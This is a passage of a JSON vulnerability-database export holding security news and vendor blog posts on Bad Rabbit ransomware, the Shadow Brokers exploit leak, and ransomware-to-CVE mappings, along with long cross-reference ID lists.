"mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2018-01-27T09:18:01", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.thn.ThnBulletin", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "THN:2E043D9BAC04DEE81005124DD54A31E2", "type": "thn", "bulletinFamily": "info", "title": "Bad Rabbit Ransomware Uses Leaked 'EternalRomance' NSA Exploit to Spread", "description": "[](<https://3.bp.blogspot.com/-33xGkI9Yvms/WfMOIMURfvI/AAAAAAAAujY/RWkoZ_nQhBEGoXHW7YNB3J8Cu1pwU7wzgCLcBGAs/s1600/bad-rabbit-ransomware-attack.png>)\n\nA new widespread ransomware worm, known as \"[Bad Rabbit](<https://thehackernews.com/2017/10/bad-rabbit-ransomware-attack.html>),\" that hit over 200 major organisations, primarily in Russia and Ukraine this week leverages a stolen NSA exploit released by the Shadow Brokers this April to spread across victims' networks. \n \nEarlier it was reported that this week's crypto-ransomware outbreak did not use any National Security Agency-developed exploits, neither [EternalRomance](<https://thehackernews.com/2017/04/window-zero-day-patch.html>) nor [EternalBlue](<https://thehackernews.com/2017/04/windows-hacking-tools.html>), but a recent report from Cisco's Talos Security Intelligence revealed that the Bad Rabbit ransomware did use EternalRomance exploit. \n \n[NotPetya ransomware](<https://thehackernews.com/2017/06/petya-ransomware-attack.html>) (also known as ExPetr and Nyetya) that infected tens of thousands of systems back in June also leveraged the [EternalRomance exploit](<https://thehackernews.com/2017/07/petya-ransomware-decryption-key.html>), along with another NSA's leaked Windows hacking exploit EternalBlue, which was used in the [WannaCry ransomware](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) outbreak. \n \n\n\n### Bad Rabbit Uses EternalRomance SMB RCE Exploit\n\n \nBad Rabbit does not use EternalBlue but does leverage EternalRomance RCE exploit to spread across victims' networks. \n \n[Microsoft](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) and [F-Secure](<https://labsblog.f-secure.com/2017/10/26/following-the-bad-rabbit/>) have also confirmed the presence of the exploit in the Bad Rabbit ransomware. \n \nEternalRomance is one of many hacking tools allegedly belonged to the NSA's elite hacking team called Equation Group that were leaked by the infamous hacking group calling itself Shadow Brokers in April this year. \n \nEternalRomance is a remote code execution exploit that takes advantage of a flaw (CVE-2017-0145) in Microsoft's Windows Server Message Block (SMB), a protocol for transferring data between connected Windows computers, to bypass security over file-sharing connections, thereby enabling remote code execution on Windows clients and servers. \n \nAlong with EternalChampion, EternalBlue, EternalSynergy and other NSA exploits released by the Shadow Brokers, the EternalRomance vulnerability was also patched by Microsoft this March with the release of a security bulletin ([MS17-010](<https://thehackernews.com/2017/04/window-zero-day-patch.html>)). \n \nBad Rabbit was reportedly distributed via drive-by download attacks via compromised Russian media sites, using fake Adobe Flash players installer to lure victims' into install malware unwittingly and demanding 0.05 bitcoin (~ $285) from victims to unlock their systems. \n \n\n\n### How Bad Rabbit Ransomware Spreads In a Network\n\n \nAccording to the researchers, [Bad Rabbit](<https://thehackernews.com/2017/10/bad-rabbit-ransomware-attack.html>) first scans the internal network for open SMB shares, tries a hardcoded list of [commonly used credentials](<https://pastebin.com/01C05L0C>) to drop malware, and also uses [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) post-exploitation tool to extract credentials from the affected systems. \n \nBad Rabbit can also exploit the Windows Management Instrumentation Command-line (WMIC) scripting interface in an attempt to execute code on other Windows systems on the network remotely, [noted](<https://www.endgame.com/blog/technical-blog/badrabbit-technical-analysis>) EndGame. \n \nHowever, according to Cisco's Talos, Bad Rabbit also carries a code that uses EternalRomance, which allows remote hackers to propagate from an infected computer to other targets more efficiently. \n \n\n\n> \"We can be fairly confident that BadRabbit includes an EternalRomance implementation used to overwrite a kernel\u2019s session security context to enable it to launch remote services, while in Nyetya it was used to install the DoublePulsar backdoor,\" Talos researchers wrote.\n\n> \"Both actions are possible due to the fact that EternalRomance allows the attacker to read/write arbitrary data into the kernel memory space.\"\n\n \n\n\n### Is Same Hacking Group Behind Bad Rabbit and NotPetya?\n\n \nSince both Bad Rabbit and NotPetya uses the commercial [DiskCryptor](<https://thehackernews.com/2017/08/locky-mamba-ransomware.html>) code to encrypt the victim's hard drive and \"[wiper](<https://thehackernews.com/2017/06/petya-ransomware-wiper-malware.html>)\" code that could erase hard drives attached to the infected system, the researchers believe it is \"highly likely\" the attackers behind both the ransomware outbreaks are same. \n \n\n\n> \"It is highly likely that the same group of hackers was behind BadRabbit ransomware attack on October the 25th, 2017 and the epidemic of the NotPetya virus, which attacked the energy, telecommunications and financial sectors in Ukraine in June 2017,\" Russian security firm Group IB [noted](<https://www.group-ib.com/blog/reportbadrabbit>).\n\n> \"Research revealed that the BadRabbit code was compiled from NotPetya sources. BadRabbit has same functions for computing hashes, network distribution logic and logs removal process, etc.\"\n\n \nNotPetya has previously been linked to the Russian hacking group known as BlackEnergy and Sandworm Team, but since Bad Rabbit is primarily targeting Russia as well, not everyone seems convinced with the above assumptions. \n \n\n\n### How to Protect Yourself from Ransomware Attacks?\n\n \nIn order to protect yourself from Bad Rabbit, users are advised to disable WMI service to prevent the malware from spreading over your network. \n \nAlso, make sure to update your systems regularly and keep a good and effective anti-virus security suite on your system. \n \nSince most ransomware spread through phishing emails, malicious adverts on websites, and third-party apps and programs, you should always exercise caution before falling for any of these. \n \nMost importantly, to always have a tight grip on your valuable data, keep a good backup routine in place that makes and saves copies of your files to an external storage device that isn't always connected to your PC.\n", "published": "2017-10-26T23:57:00", "modified": "2017-10-27T10:57:11", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://thehackernews.com/2017/10/bad-rabbit-ransomware.html", "reporter": "Mohit Kumar", "references": [], "cvelist": ["CVE-2017-0145"], "lastseen": "2018-01-27T09:17:30", "history": [], "viewCount": 32, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2018-01-27T09:17:30", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2018-01-27T09:17:30", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.thn.ThnBulletin", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}], "qualysblog": [{"cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://blog.qualys.com/securitylabs/2017/04/15/the-shadow-brokers-release-zero-day-exploit-tools", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "history": [], "modified": "2017-04-15T07:11:21", "lastseen": "2017-05-01T13:43:00", "published": "2017-04-15T07:11:21", "description": "On Friday, a hacker group known as [The Shadow Brokers](<https://en.wikipedia.org/wiki/The_Shadow_Brokers>) publicly released a large number of functional exploit tools. Several of these tools make use of zero-day vulnerabilities, most of which are in Microsoft Windows. Exploiting these vulnerabilities in many cases leads to remote code execution and full system access.\n\nBoth end-of-support and current Windows versions are impacted, including Windows 2003, XP, Vista, 7, 2008, 8, and 2012. [Microsoft has released patches](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>) for each vulnerability across all supported platforms, but will not be releasing patches for end-of-support versions of Windows. It is highly recommended that any end-of-support Windows systems be replaced or isolated, as these systems will often be impacted by new vulnerabilities, without the availability of a patch.\n\nFor zero-day vulnerabilities in Operating Systems, you can use your existing asset inventory information from [Qualys AssetView](<https://www.qualys.com/suite/assetview/>), and search for any OS to determine how many vulnerable assets are deployed. This can be done without additional scanning if the data is relatively fresh.\n\n### Detecting the Vulnerabilities\n\nQualys has released five new QIDs to detect these zero-day vulnerabilities:\n\n * 91361 Microsoft Windows SMBv3 Remote Code Execution - Shadow Brokers (ETERNALSYNERGY) [_MS17-010_](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)\n\n * 91359 Microsoft Windows Remote Privilege Escalation - Shadow Brokers (ETERNALROMANCE) [_MS17-010_](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)\n\n * 91360 Microsoft Windows SMBv1 and NBT Remote Code Execution - Shadow Brokers (ETERNALBLUE) [_MS17-010_](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)\n\n * 91357 Microsoft Windows SMBv1 Remote Code Execution - Shadow Brokers (ETERNALCHAMPION) [_CVE-2017-0146_](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146>) &amp; [_CVE-2017-0147_](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147>)\n\n * 53007 IBM Lotus Domino Remote Code Execution - Shadow Brokers (EWORKFRENZY)\n\nWe are also updating the QID we mentioned in a [previous blog post](<https://blog.qualys.com/securitylabs/2017/03/31/microsoft-iis-6-0-buffer-overflow-zero-day>) to include the Shadow Brokers exploit name:\n\n * 87284 Microsoft Internet Information Services 6.0 Buffer Overflow Vulnerability - Shadow Brokers (EXPLODINGCAN)\n\nThese new QIDs are used by [Qualys Vulnerability Management](<https://www.qualys.com/suite/vulnerability-management/>) to detect the vulnerabilities using an authenticated scan or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\n[Qualys ThreatPROTECT](<https://www.qualys.com/suite/threatprotect/>) provides one-click access to a list of impacted assets though the Live Feed, as well as a detailed analysis of The Shadow Brokers' leak, written directly by a vulnerability researcher.\n\n\n\n### Tracking and Managing Windows Assets\n\n[Qualys AssetView](<https://www.qualys.com/suite/assetview/>) can help you locate and track legacy and current Windows assets in dynamic widgets. These widgets can be clicked to get full lists of Windows assets, grouped by Operating System, and the lists can be exported for sending to remediation or evergreening teams.\n\n\n\n### Blocking Exploits\n\n[Qualys Web Application Firewall (WAF)](<https://www.qualys.com/suite/web-application-firewall/>) can block any attempts to exploit the \"EXPLODINGCAN\" vulnerability if upgrading or disabling WebDAV is not an option. Full details are posted here: [Protect Against Critical IIS 6.0 Buffer Overflow vulnerability (CVE-2017-7269) with Qualys WAF](<https://blog.qualys.com/webappsec/2017/03/30/protect-against-critical-iis-6-0-buffer-overflow-vulnerability-cve-2017-7269-with-qualys-waf>).\n\n### Get Started Now\n\nTo start detecting and protecting against critical vulnerabilities, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=apache-struts-q1-2017&utm_content=trial&leadsource=344554007>). All features described in this article are available in the trial.", "title": "The Shadow Brokers Release Zero Day Exploit Tools", "cvelist": ["CVE-2017-7269", "CVE-2017-0147", "CVE-2017-0146"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 339, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2017-05-01T13:43:00", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:6AB96156-E704-460D-9CB4-65F529E51D90", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-7269", "CVE-2017-0146"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0249"]}, {"type": "seebug", "idList": ["SSV:92834", "SSV:92952", "SSV:92964"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/IIS/IIS_WEBDAV_SCSTORAGEPATHFROMURL", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785050", "MYHACK58:62201892204", "MYHACK58:62201784747", "MYHACK58:62201785000", "MYHACK58:62201785039", "MYHACK58:62201785397", "MYHACK58:62201784835", "MYHACK58:62201784836"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310140228", "OPENVAS:1361412562310811206", "OPENVAS:1361412562310810698"]}, {"type": "threatpost", "idList": ["THREATPOST:752864660896CF677AF67798E68952F0", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:2086A75F024930F586197B1CF4B4B91A"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142471", "PACKETSTORM:146236", "PACKETSTORM:142060", "PACKETSTORM:142548", "PACKETSTORM:141997"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:41992", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41738"]}, {"type": "zdt", "idList": ["1337DAY-ID-27757", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27446", "1337DAY-ID-27786"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "canvas", "idList": ["IIS6_PROPFIND", "MS17_010"]}, {"type": "mskb", "idList": ["KB3197835", "KB4013389"]}, {"type": "cisa", "idList": ["CISA:D39D876E64786DC5F13FB718A4507342"]}, {"type": "thn", "idList": ["THN:129FB15A6EC81B3F21210807A7547381"]}, {"type": "securelist", "idList": ["SECURELIST:5B679E7779B8DC4B28B53545967190C4", "SECURELIST:9E27BB3C9444305AA7FFD267587363A1", "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A"]}, {"type": "nessus", "idList": ["IIS6_WEBDAV_CVE-2017-7269.NASL", "700099.PRM", "SMB_NT_MS17_JUNE_XP_2003.NASL", "IIS6_WEBDAV_CVE-2017-7269_DIRECT.NASL", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10999"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0147", "MS:CVE-2017-0146"]}, {"type": "ics", "idList": ["ICSMA-17-215-01"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kitploit", "idList": ["KITPLOIT:7013881512724945934"]}], "modified": "2017-05-01T13:43:00", "rev": 2}}, "reporter": "Jimmy Graham", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "qualysblog", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "hash": "c8cb2ddabac0ab9940255a91a6a20b3e", "type": "qualysblog", "bulletinFamily": "blog", "title": "The Rise of Ransomware", "description": "With most employees still working from remote locations, ransomware attacks have increased steadily since the early months of the Covid-19 pandemic. According to the FBI\u2019s 2020 Internet Crime Report 2400+ ransomware-related incidents in 2020 resulted in a loss of about 29 million dollars. These numbers are only getting worse and do not include damage from incidents not reported to the FBI.\n\nRansomware attacks affect various industries worldwide, and ransomware demands continue to increase. Some recent examples include:\n\n * [Conti Ransomware:](<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>) Conti ransomware is spread using spear phishing campaigns through tailored emails that contain malicious attachments or malicious links and via stolen or weak Remote Desktop Protocol (RDP) credentials. \n * [Netfilm Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/05/12/nefilim-ransomware>): Nefilim ransomware is distributed through exposed Remote Desktop Protocol (RDP) setups by brute-forcing them and using other known vulnerabilities for initial access, such as Citrix gateway devices.\n * [REvil Ransomware:](<https://blog.qualys.com/product-tech/2021/07/08/kaseya-revil-ransomware-attack-cve-2021-30116-automatically-discover-and-prioritize-using-qualys-vmdr>) REvil is a ransomware family that operates as ransomware-as-a-service (RaaS), has been linked to GOLD SOUTHFIELD, a financially motivated group, and was first identified in April 2019 according to MITRE.\n * [DarkSide Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/06/09/darkside-ransomware>) : DarkSide ransomware performs brute force attacks and exploits known vulnerabilities in the remote desktop protocol (RDP) to gain initial access. DarkSide ransomware, first seen in August 2020 and updated as v2.0 in March 2021, is associated with the DarkSide group and now often operates as RaaS.\n * [Michigan State University (May 2020)](<https://www.zdnet.com/article/michigan-state-university-hit-by-ransomware-gang/>) - The MSU administrators were given a week to pay an undisclosed ransom demand to decrypt their files. In case MSU officials refuse to pay or choose to restore backups, the cybercriminals were prepared to leak documents stolen from the university&#x27;s network on a special website the group is operating on the dark web.\n * [DearCry and Exchange vulnerabilities](<https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/>) - DearCry ransomware attacks exploited Microsoft Exchange Server vulnerabilities CVE-2021-26855 and CVE-2021-27065. These vulnerabilities were being widely exploited before patches were available. Forcing Microsoft to release out-of-band updates. \n * [Colonial Pipeline](<https://www.cnbc.com/2021/06/08/colonial-pipeline-ceo-testifies-on-first-hours-of-ransomware-attack.html>) - Colonial Pipeline was most likely target of ransomware attack due vulnerable, outdated version of Microsoft Exchange. Attackers potentially exploited these vulnerabilities, and as a result, Colonial Pipeline took its systems down to contain the threat, limiting gasoline supply to the east coast. \n\nAs seen above, industries ranging from education, manufacturing, electronics, research, health and more are impacted by ransomware.\n\nTo help organizations combat risks from ransomware, Qualys is introducing Ransomware Risk Assessment service. As outlined in [_our blog_](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>), the Qualys Ransomware Risk Assessment &amp; Remediation service leverages the security intelligence which is curated by Qualys Research experts to map ransomware families to specific vulnerabilities, misconfigurations, and vulnerable software. The Qualys Ransomware Risk Assessment service enables organizations to:\n\n * Get a unified view into critical ransomware exposures such as internet-facing vulnerabilities and misconfigurations, insecure remote desktop gateways (RDP), as well as detection of risky software in datacenter environment along with alerting for assets missing anti-malware solutions. \n * Accelerate remediation of Ransomware exposure~~s~~ with zero-touch patching by continuously patching ransomware-vulnerabilities as they are detected. The remediation plan also enables proactive patching for prioritized software to help you keep software up to date. \n\n#### **Ransomware Infection Vectors**\n\nAlthough cyber criminals use a variety of techniques to infect victims with ransomware, the most common means of infection are: \n\n * **Remote Desktop Protocol** (RDP) vulnerabilities: RDP allows individuals to see and control the system remotely. It is a very common practice in organizations as it provides easy access to systems remotely. Once cybercriminals have RDP access, they can deploy malicious software on the system, making it inaccessible to legitimate users unless the victim pays the demanded ransom. Shodan search shows currently open and potentially vulnerable RDP services on the internet, and you can buy RDP access for [as low as US$3](<https://www.bankinfosecurity.com/how-much-that-rdp-credential-in-window-a-10590>). \n\n\n\n * **Email phishing campaigns**: Email is a prevalent medium to get malware into the target environment. Cybercriminals use emails to send malicious links to deploy malware on recipients\u2019 machines. It allows cybercriminals to steal sensitive data without breaking through network security and is very common among cybercriminals. \n * **Software vulnerabilities**: Software vulnerabilities are even more prevalent than phishing. Client- and server-side vulnerabilities allow criminals to take advantage of security weaknesses in widely used software programs, gain control of victim systems, and deploy ransomware. Vulnerabilities in VPN systems such as Pulse Secure VPN and Fortinet are common targets as well.\n\n#### **Ransomware Attacks and Exact CVEs To Prioritize for Monitoring**\n\nAs mentioned above known vulnerabilities and weakness are one of the top infection vectors. \n\nQualys research team has performed extensive research on 36 prevalent ransomware families and have mapped them to 64 CVEs and the 247 QIDs that can detect them. The following is just a sample list of some of most widely used ransomware in the attacks along with the CVEs leveraged to infect systems. \n\n**Ransomware**| **Description**| **CVE (s)**| QID (s) \n---|---|---|--- \nConti | The Conti ransomware strain will not only encrypt important files but will also exfiltrate them to a location controlled by the attacker. This method of extortion-ware is used to force victims to pay the ransom in order to avoid the sensitive data from being leaked. Conti operators are known to use well-known hacking tools such as Mimikatz and Cobalt Strike leading up to the encryption of files | CVE-2020-1472, CVE-2021-34527, \nCVE-2017-0143, CVE-2017-0144, CVE-2017-0145 | 91680, \n91668, \n91785, \n91345, \n91360 \nTeslacrypt, PrincessLocker | TeslaCrypt ransomware was uploaded to VirusTotal in November 2014 but was more widely spread in early 2015 and continues to evolve. TeslaCrypt encrypts the files using AES-256 algorithm until the victim pays the ransom in either Bitcoin or Cash Cards. | CVE-2013-2551, CVE-2015-8651 | 168351, 168350, 124422, 168341, 168340, 100271, 124421 \nLocky, Cerber | Cerber ransomware is ransomware-as-a-service (RaaS), meaning an attacker can distribute the licensed copy of this ransomware over the internet and pay commissions to the developer. | CVE-2016-1019 | 256924, 256922, 177873, 176784, 296029, 296028, 170815, 170724, 170711, 170365, 256256, 170264, 236438, 170119, 256214, 170052, 276628, 236342, 157445, 169942, 169941, 169923, 276572, 169854, 169853, 176004, 196742, 196725, 370320, 276455, 175965, 168848, 168813, 168792, 168696, 168694, 168594, 100282, 124879, 124872 \nWannaCry, Badrabbit | The WannaCry ransomware \u2014 formally known as WanaCrypt0r 2.0 \u2014 spreads using an exploit called EternalBlue for a Windows OS vulnerability that Microsoft patched in March 2017. | CVE-2017-0145 | 91361, 91360, 91359, 91347, 91345 \nDearCRy, BlackKingdom | DearCry takes advantage of compromised Microsoft Exchange Servers with vulnerability CVE-2021-26855. When exploited, cybercriminals gain initial access to the Exchange Server and then install web shells. | CVE-2021-26855 | 50107, 50108 \n \n### Unified View of Critical Ransomware Risk Exposures\n\nIt is a daunting task to get a unified view of multiple critical ransomware exposures together such as internet-facing vulnerabilities, misconfigurations as well as unauthorized software. Qualys Ransomware Risk Assessment &amp; remediation service dashboard enables security teams to see all the internet-facing assets that are exposed to ransomware related vulnerability or 